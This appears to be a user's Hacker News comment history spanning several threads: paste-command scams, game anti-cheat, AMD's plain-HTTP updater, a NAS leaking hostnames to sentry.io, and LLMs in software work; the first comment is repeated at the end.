I wonder if someone more creative than me would be able to push this to do things it was not designed to do. I recently found a video where someone exploited some properties of certain transcript file formats to be able to make a primitive simple drawing app with Youtube's video player's closed captions.[0]
Since a brush's code can see the state of the canvas and draw on it, perhaps there can be a brush that does the opposite here, and instead renders a simple "video" when you hold down the mouse? Or even a simple game, like Tic-Tac-Toe.
I understand that obviously isn't the purpose of the brush programs, but I think it is an interesting challenge, just for fun.
[0] The video I am thinking of is by a channel named Firama, but they did not explain how they accomplished it. Another channel, SWEet, made their own attempt, which wasn't as full-featured as the original, but they did document how they did it.
> Never follow a shortened link without expanding it using a utility like Link Unshortener from the App Store,
I am unfamiliar with the Apple ecosystem, but is there anything special about this specific app that makes it trustworthy (e.g: reputable dev, made by Apple, etc.)? Looking it up, it seems like an $8 app for a link unshortener app.
In any case, there have been malicious sites that return different results based on the headers (e.g: user agent. If it is downloaded via a user-agent of a web browser, return a benign script, if it is curl, return the malicious script). But I suppose this wouldn't be a problem if you directly inspect and use the unshortened link.
> Terminal isn’t intended to be a place for the innocent to paste obfuscated commands
Tale as old as time. Isn't there an attack that was starting to get popular last year on Windows of a "captcha" asking you to hit Super + R, and pasting a command to "verify" your captcha? But I suppose this type of attack has been going on for a long, long, time. I remember Facebook and some other websites used to have a big warning in the developer console, asking not to paste scripts users found online there, as they are likely scams and will not do what they claim the script would do.
---
Side-Note: Is the layout of the website confusing for anyone else? Without borders on the image, (and the image being the same width of the paragraph text) it seemed like part of the page, and I found myself trying to select text on the image, and briefly wondering why I could not do so. Turning on my Dark Reader extension helped a little bit, since the screenshots were on a white background, but it still felt a bit jarring.
Agreed, the lack of borders or indentation on the screenshots is very confusing. It's hard to understand what text comes from the malicious website and what is from the author.
> they should provide built-in anti-cheat support in the OS.
As much as I dislike anti-cheat in general (why incorporate it instead of just having proper moderation and/or private servers? Do you need a sketchy third-party kernel level driver to police you to make sure you're "browsing the internet properly in a way that is compliant with company XYZ's policies", or even when running other software like a photo editor, word processor, or anything else? It's _your_ software that you bought.) something similar is already happening with, e.g, Widevine bundled in browsers for DRM-ed video streaming.
I agree that having some first-party or reputable anti-cheat driver or system, is probably preferable than having different studios roll out their own anticheat drivers. (I am aware there are studio-level or common third party common anti-cheat solutions already, such as Denuvo or Vanguard. But I would prefer something better)
> why incorporate it instead of just having proper moderation and/or private servers?
No one wants to become a moderator, they do it out of necessity. So it's pretty much the other way around: a lot of anticheats were, and are, originally developed by community members for private servers (because you're not deploying a 3rd party anti-cheat onto first party servers). BattleEye was originally for Battlefield games. Punkbuster for Team Fortress. EasyAntiCheat for Counter Strike. I even remember Starcraft Brood War 3rd party server ICCUP with a custom 'anti-hack' client requirement.
You still see this today with Counter Strike 2 private servers Face-IT: they have additional anti-cheat not less. Same with GTA V modded private server, FiveM have anti-cheat they call adhesive.
And then game developer saw that players are doing that, so they integrate the anti-cheat so that players do not have to go downloading/installing the anti-cheat separately. Quake 3 Arena added Punkbuster in an update for example.
>why incorporate it instead of just having proper moderation and/or private servers?
Because game studios these days are all about global matchmaking. Private servers aren't really a thing any more except in more niche games. Instead you (optionally with a party) queue for matchmaking. Every game has to have a ranked ladder these days, it seems.
I miss the days of Tribes 2 or CS1.6 when games had server browsers
> Because game studios these days are all about global matchmaking
Why not have moderation then? When participating in an online forum, you are essentially "matchmaking" to a topic or corner of the internet with similar interests. Have some moderators (be it members of the community, or staff) ban players on obvious hacking/cheating or rule-breaking behaviour, and allow members to report any instances of this (I believe this is already a thing in modern video games, I have seen videos of "influencers" getting enraged when losing and reporting players for "stream sniping").
Sure, this might cause the usual issues of creating an echo chamber where mods and admins might unfairly ban members of the community. But you could always just join a different server in that case.
I believe Minecraft has a system similar to what I described; you enter the URL of a server to join, each hosted on its own independent instance (not necessarily hosted by Mojang, the studio behind Minecraft) each with their own unique sets of rules and culture, and being banned in one server does not ban you from every other server. Incidentally, Minecraft also does not have kernel level anticheat, and still very successfully manages to be one of the most popular games around (By some accounts, the top-selling game of all time).
> I miss the days of Tribes 2 or CS1.6 when games had server browsers
>I believe Minecraft has a system similar to what I described
Except every big server has to run an anticheat. Some servers required clients with client side anticheats even. Some servers required you to screen share with a moderator and they would go through the files on your computer to look for cheats. Exploiting people for free labor to moderate servers was never enough to stop the issues cheating had. Even with these volunteers anticheat was essential for see what players were flagging checks to know who to watch over.
> Except every big server has to run an anticheat. Some servers required clients with client side anticheats even.
I am fine with anticheat on the server-side to help volunteers/moderators find issues, since it does not force the user to install any sketchy kernel-level software. As for the servers that require client-side anticheats, I was unaware there are Minecraft servers that do this (though I do not doubt you, and believe you when you say they exist), and can't speak to it.
> Some servers required you to screen share with a moderator and they would go through the files on your computer to look for cheats.
I was not aware this is a practice that some servers do. It is beyond ridiculous to ask to screen share just to verify no cheats were involved imo, and is a major invasion of privacy. The only scenario I can see this being okay, is in a physically hosted event, where players are playing on devices provided by the event organisers, so there would be no expectation of privacy in any case, in the same way you do not have an expectation of privacy on a work device.
In both cases, you could always find a different server that does not run anticheat, or even start your own server (if you were willing to do that). This isn't something that can even be done in other modern games that employ anticheat drivers and only allow connecting to their single official server.
Re: exploiting people for free labor to moderate servers
Nobody is forcing them to do it, I imagine they do it because they enjoy it and want to give back to the community, the same way someone would contribute to open source or moderate a forum in their spare time. In any case, is it always "free labor"? I have heard of paid-transactions and/or donations, sponsors, or servers being hosted by streamers who have other sources of income to pay for moderators. Though admittedly, I am not familiar with Minecraft in particular and if this is actually the case in most servers.
>the same way someone would contribute to open source or moderate a forum in their spare time
It would be like open source business where the owner makes millions of dollars a month off the software and then tries to get people to work for him for free to make him even more money. The volunteers do all the work and the owner makes all of the money.
> I agree that having some first-party or reputable anti-cheat driver or system, is probably preferable than having different studios roll out their own anticheat drivers. (I am aware there are studio-level or common third party common anti-cheat solutions already, such as Denuvo or Vanguard. But I would prefer something better)
Only Apple really has enough platform lockdown to achieve that. Whatever Microsoft ships would have more holes than swiss cheese (not that I'm opposed to that or anything).
Would that not create the issue that you would only need to find one bypass for said official anti-cheat that then works for all games out there?
I heard with Denuvo reverse engineering work needs to be done for each individual target to unprotect it, but I'm not sure how this will be the case with a first party anti-cheat driver.
While I don't like that the executable's update URL is using just plain HTTP, AMD does explicitly state that in their program that attacks requiring man-in-the-middle or physical access is out-of-scope.
Whether you agree with whether this rule should be out-of-scope or not is a separate issue.
What I'm more curious about is the presence of both a Development and Production URL for their XML files, and their use of a Development URL in production. While like the author said, even though the URL is using TLS/SSL so it's "safe", I would be curious to know if the executable URLs are the same in both XML files, and if not, I would perform binary diffing between those two executables.
I imagine there might be some interesting differential there that might lead to a bug bounty. For example, maybe some developer debug tooling that is only present only in the development version but is not safe to use for production and could lead to exploitation, and since they seemed to use the Development URL in production for some reason...
For paying out, maybe, but this is 100% a high priority security issue regardless of AMD's definition of in scope, and yet because they won't pay out for it they also seem to have decided not to fix it.
I already said I do not like that it is just using HTTP, and yes, it is problematic.
What I am saying is that the issue the author reported and the issue that AMD considers man-in-the-middle attacks as out-of-scope, are two separate issues.
If someone reports that a homeowner has the keys visibly on top of their mat in front of their front-door, and the homeowner replies that they do not consider intruders entering their home as a problem, these are two separate issues, with the latter having wider ramifications (since it would determine whether other methods and vectors of mitm attacks, besides the one the author of the post reported, are declared out-of-scope as well). But that doesn't mean the former issue is unimportant, it just means that it was already acknowledged, and the latter issue is what should be focused on (At least on AMD's side. It still presents a problem for users who disagree with AMD of it being out-of-scope).
The phrasing of your first two sentences in your first post makes it sound like you're dismissing the security issue. For saying that it's a real security issue and then another issue on top you should word it very differently.
> The phrasing of your first two sentences in your first post makes it sound like you're dismissing the security issue.
Genuine question, How does it sound like I'm dismissing it? My first sentence begins with the the phrase
> I don't like that the executable's update URL is using just plain HTTP
And my second sentence
> Whether you agree with whether this rule should be out-of-scope or not is a separate issue.
which, with context that AMD reported MITM as out-of-scope, clearly indicates that I think of it as an issue, albeit, a separate one from the one the author already reported.
> The bots will quite possibly have no extensions at all
I imagine most users will also not have extensions at all, so this would not be a reliable metric to track bots. Maybe it might be hard to imagine for someone whose first thing to do after installing a web browser is to install some extensions that they absolutely can't live without (ublock origin, privacy badger, dark mode reader, noscript, vimium c, whatever). But I imagine the majority of casual users do not install any extensions or even know of its existence (Maybe besides some people using something like Grammarly, or Honey, since they aggressively advertise on Youtube).
I do agree with the rest of your reasons though, like if bots used a specific exact combinations of extensions, or if there was an extension specifically for linkedin scraping/automation they want to detect, and of course, user tracking.
> the characters ’n’ and ‘o’ differ by only one bit; an unpredictable error that sets that bit could change GenuineIntel to GenuineIotel.
On a QWERTY keyboard, the O key is also next to the I key. It's also possible someone accidentally fat-fingered "GenuineIontel" , noticed something was off, and moved their cursor between the "o" and "n", and accidentally hit Delete instead of Backspace.
Maybe an unlikely set of circumstances, but I imagine a random bit flip caused at the hardware-level is rare since it might cause other problems, if something more important was bit-flipped.
I like this theory - I can totally imagine some big spreadsheet of processor model names where someone copy/pastes the model name to some janky firmware-programming utility running on an off-the-shelf mini PC on the manufacturing floor, implemented as a "temporary fix" 5 years ago, every time the production line changes CPU model.
Is "clown GCP Host" a technical term I am unaware of, or is the author just voicing their discontent?
Seems to me that the problem is the NAS's web interface using sentry for logging/monitoring, and part of what was logged were internal hostnames (which might be named in a way that has sensitive info, e.g, the corp-and-other-corp-merger example they gave. So it wouldn't matter that it's inaccessible in a private network, the name itself is sensitive information.).
In that case, I would personally replace the operating system of the NAS with one that is free/open source that I trust and does not phone home. I suppose some form of adblocking ala PiHole or some other DNS configuration that blocks sentry calls would work too, but I would just go with using an operating system I trust.
No it's because lots of stuff is duct taped together and then you have tons of scripts or tooling that was someone's weekend project (to make their oncall burden easier) that they shared around. Usually there'll be a flag like --clowntown or --clowny-xyz when it's obvious to all parties involved that it's destined to destroy everything one day but YOLO (also a common one).
Could you please stop posting unsubstantive comments and flamebait? You've unfortunately been doing it repeatedly. It's not what this site is for, and destroys what it is for.
You may not owe clown-resemblers better, but you owe this community better if you're participating in it.
We ban accounts that keep posting in this sort of pattern, as yours has, so if you'd please review https://news.ycombinator.com/newsguidelines.html and stick to the rules when posting here, we'd appreciate it.
As long as you and I both agree on the truth, I am willing to go along with your moderation. I can cut down on some of the editorial remarks, but everyone on this site engages in some level of unsubstantiated commentary and I really would appreciate knowing what % of posts can be unsubstantiated opinion before it becomes a significant pattern.
I remember the term "clown computing" to describe "cloud computing" from IRC earlier than 2016
I use a localhost TLS forward proxy for all TCP and HTTP over the LAN
There is no access to remote DNS, only local DNS. I use stored DNS data periodically gathered in bulk from various sources. As such, HTTP and other traffic over TCP that use hostnames cannot reach hosts on the internet unless I allow it in local DNS or the proxy config
For me, "WebPKI" has proven useful for blocking attempts to phone home. Attempts to phone home that try to use TLS will fail
I also like adding CSP response header that effectively blocks certain Javascript
It sounds like the blog author gave the NAS direct access to the internet
Every user is different, not everyone has the same preferences
Another habit I follow is to set the gateway of (a) computers I cannot trust, i.e., ones running corporate OS I cannot control, to (b) a computer that I believe I can control running UNIX-like OS that I compiled from source
I run tcpdump on (b)
(b) is the only computer with direct access to the internet
The only time I have seen a sentry.io DNS request is from (a)
> It sounds like the blog author gave the NAS direct access to the internet
FTFA:
Every time you load up the NAS [in your browser], you get some clown GCP host knocking on your door, presenting a SNI hostname of that thing you buried deep inside your infrastructure. Hope you didn't name it anything sensitive, like "mycorp-and-othercorp-planned-merger-storage", or something.
Around this time, you realize that the web interface for this thing has some stuff that phones home, and part of what it does is to send stack traces back to sentry.io. Yep, your browser is calling back to them, and it's telling them the hostname you use for your internal storage box. Then for some reason, they're making a TLS connection back to it, but they don't ever request anything. Curious, right?
This is when you fire up Little Snitch, block the whole domain for any app on the machine, and go on with life.
I disagree with your conclusion. The post speaks specifically about interactions with the NAS through a browser being the source of the problem and the use of an OSX application firewall program called Little Snitch to resolve the problem. [0] The author's ~fifteen years of posts demonstrate that she is a significantly accomplished and knowledgeable system administrator who has configured and debugged much trickier things than what's described in the article.
It's not impossible that the source of the problem has been misidentified... but it's extremely unlikely. Having said that, one thing I do find likely is that the NAS in question is isolated from the Internet; that's just a smart thing that a savvy sysadmin would do.
[0] I find it... unlikely that the NAS in question is running OSX, so Little Snitch is almost certainly running on a client PC, rather than the NAS.
> Is "clown GCP Host" a technical term I am unaware of, or is the author just voicing their discontent?
The term has been in use for quite some time; It is voicing sarcastic discontent with the hyperscaler platforms _and_ their users (the idea being that the platform is "someone else's computer" or - more up to date - "a landlord for your data"). I'm not sure if she coined it, but if she did then good on her!
Not everyone believes using "the cloud" is a good idea, and for those of us who have run their own infrastructure "on-premises" or co-located, the clown is considered suitably patronising. Just saying ;)
> the idea being that the platform is "someone else's computer"
I have a vague memory of once having a userscript or browser extension that replaced every instance of the word "cloud" with "other peoples' computers". (iirc while funny, it was not practical, and I removed it).
fwiw I agree and I do not believe using "the cloud" for everything is a good idea either, I've just never heard of the word "clown" being used in this way before now.
I remember ridiculing "cloud computing" by calling it "clown computing" decades ago. It's pretty old and well established snark-jargon, like spelling Micro$oft with a dollar sign.
What are your thoughts on the usefulness of tribal knowledge when older (age-wise) employees change jobs? [0]
Then, the tribal knowledge they had at their previous place of employment won't be as useful somewhere else. Though I suppose you can make an argument that they might have similar workflows, or tools, or they might just have general experience that would be useful.
But I suppose your comment was more on the under-appreciation by management of existing tribal knowledge in a team.
[0] Perhaps out of necessity, e.g: company went under, or maybe they want a change of pace.
> most tech debt isn’t actually created in the code, it’s created in product meetings. Deadlines. Scope cuts.
> When asked what would help most, two themes dominated
> Reducing ambiguity upstream so engineers aren’t blocked...
I do wonder how much LLMs would help here, this seems to me at least, to be a uniquely human problem. Humans (Managers, leads, owners, what have you) are the ones who interpret requirements, decide deadlines, features and scope cuts and are the ones liable for it.
What could an LLM do to reduce ambiguity upstream? If it was trained with information on requirements, this same information could be documented somewhere for engineers to refer to. If it were to hallucinate or "guess" an answer without talking to a person for clarification, and which might turn out to not be correct, who would be responsible for it? imo, the bureaucracy and waiting for clarification mid-implementation is a necessary evil. Clever engineers, through experience, might try implement things in an open way that can be easily changed for future changes they predict might happen.
As for the second point,
> A clearer picture of affected services and edge cases
> three categories stood out: state machine gaps (unhandled states caused by user interaction sequences), data flow gaps, and downstream service impacts.
I'd agree. Perhaps when a system is complex enough, and a developer is laser focused on a single component of it, it is easy to miss gaps when other parts of the system are used in conjunction with it. I remember a while ago, it used to be a popular take that LLMs were a useful tool for generating unit tests, because of their usual repetitive nature and because LLMs were usually good at finding edge cases to test, some of which a developer might have missed.
---
I will say, it is refreshing to see a take on coding assistants being used on other aspects instead of just writing code, which as the article pointed out, came with its own set of problems (increase Inefficiencies in other parts of the development lifecycle, potential AI-introduced security vulnerabilities, etc.)
> the faded colors, limited palette along with the dithering really grew on me
I wonder if the similarity of a faded photo (like a faded polaroid) might have helped with this, especially if already has memories and some similar photos.
I have not used a e-ink tablet in a long time (since the Kobo Glo), but since I've stopped reading fiction, I do not really see the allure of devices for myself. They're far too expensive to use as an alternative to a notebook, screens as usually too small to read technical non-fiction textbooks (Think, PDFs instead of EPUBs), and if I wanted to look at media with colors, I do not think most current color e-ink displays are good enough for a pleasing experience. I think, like the author said, it is nice to use a digital photo frame that does not need to be recharged often and can easily swap out the photos.
I wonder if someone more creative than me would be able to push this to do things it was not designed to do. I recently found a video where someone exploited some properties of certain transcript file formats to be able to make a primitive simple drawing app with Youtube's video player's closed captions.[0]
Since a brush's code can see the state of the canvas and draw on it, perhaps there can be a brush that does the opposite here, and instead renders a simple "video" when you hold down the mouse? Or even a simple game, like Tic-Tac-Toe.
I understand that obviously isn't the purpose of the brush programs, but I think it is an interesting challenge, just for fun.
[0] The video I am thinking of is by a channel named Firama, but they did not explain how they accomplished it. Another channel, SWEet, made their own attempt, which wasn't as full-featured as the original, but they did document how they did it.
reply